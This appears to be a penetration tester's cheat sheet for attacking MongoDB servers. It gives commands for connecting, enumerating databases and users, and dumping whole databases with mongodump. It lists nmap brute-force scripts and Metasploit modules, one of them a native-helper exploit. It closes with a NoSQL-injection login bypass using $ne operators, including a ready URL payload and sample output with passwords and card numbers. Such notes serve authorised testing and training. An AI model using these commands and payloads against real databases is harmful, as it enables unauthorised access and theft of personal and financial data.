Mongo DB

1. Shodan :
2. Mongodb
3. port : 27017 , 28017
4. 6379
5. couchdb , 5984
6.  
7. Tools Automated Assessments (Nosqlmap):
8.  
9. http://github.com/tcstool/nosqlmap
10.  
11. How to attack :
12. https://github.com/all3g/exploit-exercises/blob/master/mongodb/mongodb_hacking.md
13.  
14.  
15. install :
16. apt-get install mongodb-clients
17.  
18. $ echo 'deb http://downloads-distro.mongodb.org/repo/debian-sysvinit dist 10gen' | sudo tee /etc/apt/sources.list.d/mongodb.list
19.  
20. $ sudo apt-get update
21. $ sudo apt-get install mongodb-org
22.  
23. $ apt-get install mongodb-org=2.6.0 mongodb-org-server=2.6.0 mongodb-org-shell=2.6.0 mongodb-org-mongos=2.6.0 mongodb-org-tools=2.6.0
24.  
25. # sudo service mongod start
26. # sudo service mongod stop
27.  
28.  
29.  
30.  
31. How to :
32.  
33.  
34.  
35. Connect to DB:
36. mongo --port <port> -u <username> -p <password> <IP>
37. Note: Port 27017 is default value
38.  
39. ex: mongo -u foo -p bar 10.10.10.10
40.  
41.  
42. Show server info:
43. db.adminCommand( { "hostInfo" : 1 } )
44. ex: db.adminCommand( { "hostInfo" : 1 } )
45. {
46. "system" : {
47. "currentTime" : ISODate("2014-03-01T14:47:54.379Z"),
48. "hostname" : "AwesomePC",
49. "cpuAddrSize" : 64,
50. "memSizeMB" : 1002,
51. "numCores" : 2,
52. "cpuArch" : "x86_64",
53. "numaEnabled" : false
54. },
55. "os" : {
56. "type" : "Linux",
57. "name" : "PRETTY_NAME=\"Debian GNU/Linux 7 (wheezy)\"",
58. "version" : "Kernel 3.2.0-4-amd64"
59. },
60. "extra" : {
61. "versionString" : "Linux version 3.2.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.63-2+deb7u1",
62. "libcVersion" : "2.13",
63. "kernelVersion" : "3.2.0-4-amd64",
64. "cpuFrequencyMHz" : "2266.747",
65. },
66. "ok" : 1
67. }
68. >
69.  
70.  
71. Show users:
72. show users
73. -or-
74. db.runCommand( { usersInfo: 1 } )
75.  
76. ex: show users
77.  
78.  
79. Show roles:
80. show roles
81.  
82. ex: show roles
83.  
84.  
85. Show databases:
86. show dbs
87.  
88. ex: show dbs
89. SecretDB (size of DB)
90. AwesomeDB (size of DB)
91. EmptyDB (empty)
92.  
93.  
94. Use database:
95. use <db_name>
96.  
97. ex: use SecretDB
98.  
99.  
100. Show tables (called collections):
101. show tables
102. -or-
103. show collections
104. -or-
105. db.getCollctionNames()
106.  
107. ex: show tables
108. fluffy
109. users
110.  
111.  
112. List data in the table/collection:
113. db.<table_name>.find()
114.  
115. ex: db.users.find()
116.  
117. Note: by default, it will only display one page
118.  
119. Can also set limit with:
120. db.<table_name>.find().limit(#)
121.  
122. ex: db.users.find().limit(5)
123.  
124.  
125. Search for exact match in the table/collection:
126. db.<collection_name>.find( { <column_name> : "<value>" } )
127.  
128. ex: db.users.find( { name : "Tony" } )
129.  
130.  
131. Wildcard search data in the table/collection:
132. db.<collection_name>.find( { <column_name> : /<value>/i } )
133.  
134. Note: the i at the end of the /, makes the search case insensitive
135.  
136. ex: db.users.find( { name : /tony/i } )
137.  
138.  
139. Dump the DB for off-line grepping:
140. mongodump -u <user> -p <pass> -h <IP> --db <db_name>
141.  
142. ex: mongodump -u foo -p bar -h 10.10.10.10 --db SecretDB
143.  
144. Note: Results are dumped to: dump/<db_name>/<collection_name>.bson
145.  
146.  
147. Logout:
148. logout
149.  
150.  
151.  
152.  
153. CAVEATS:
154. The cat command reads your own files, not the remote system's files
155. ex: cat ("/etc/shadow") is your own shadow file :( Bummer, I know!
156.  
157.  
158. find : db.users.find( { "email" : "xxx@xxx.com" } )
159.  
160. insert Data :
161. db.table.insert({name: "xxx" , lnam:"alalala" )
162.  
163.  
164.  
165. Wiki :
166. http://www.mongodbspain.com/wp-content/uploads/2014/03/MongoDBSpain-CheetSheet.pdf
167. ========================================================================
168.  
169. # Vulnerability Assessment
170.  
171. nmap -p 27017 <ipaddress>
172. nmap -p 27017 -sV <ipaddress>
173. nmap -p 27017 --script mongodb-brute <ipadress>
174. nmap -p 27017 --script mongodb-databases <ipaddress>
175.  
176. msf > use auxiliary/scanner/mongodb/mongodb_login
177. msf > use auxiliary/gather/mongodb_js_inject_collection_enum
178. msf > use exploit/linux/misc/mongod_native_helper
179.  
180. nmap -p 28017 <ipaddress>
181. nmap -p 28017 -sV <ipaddress>
182.  
183. http://<ipaddress>:28017/
184.  
185. ========================================================================
186.  
187. # Attacking Applications
188.  
189. > db.users.find({"username":"jim", "password": {$ne: "0x00"}})
190. { "_id" : ObjectId("55d5d719d60515e316247247"), "username" : "jim", "password" : "jim", "email" : "jim@gmail.com", "cardnumber" : 54321 }
191.  
192.  
193. If you notice, the above MongoDB command is fetching all the documents where the username is "jim" and password not equals to "0x00".
194.  
195.  
196.  
197. > db.users.find({"username": {$ne: "0x00"}, "password": {$ne: "0x00"}})
198. { "_id" : ObjectId("55d5d6f2d60515e316247246"), "username" : "tom", "password" : "tom", "email" : "tom@gmail.com", "cardnumber" : 12345 }
199. { "_id" : ObjectId("55d5d719d60515e316247247"), "username" : "jim", "password" : "jim", "email" : "jim@gmail.com", "cardnumber" : 54321 }
200. { "_id" : ObjectId("55d5d739d60515e316247248"), "username" : "bob", "password" : "bob", "email" : "bob@gmail.com", "cardnumber" : 22222 }
201.  
202.  
203. This time, we are able to see all the documents that do not meet the condition username and password as "jim".
204.  
205. http://localhost/index.php?username[$ne]=test&password[$ne]=test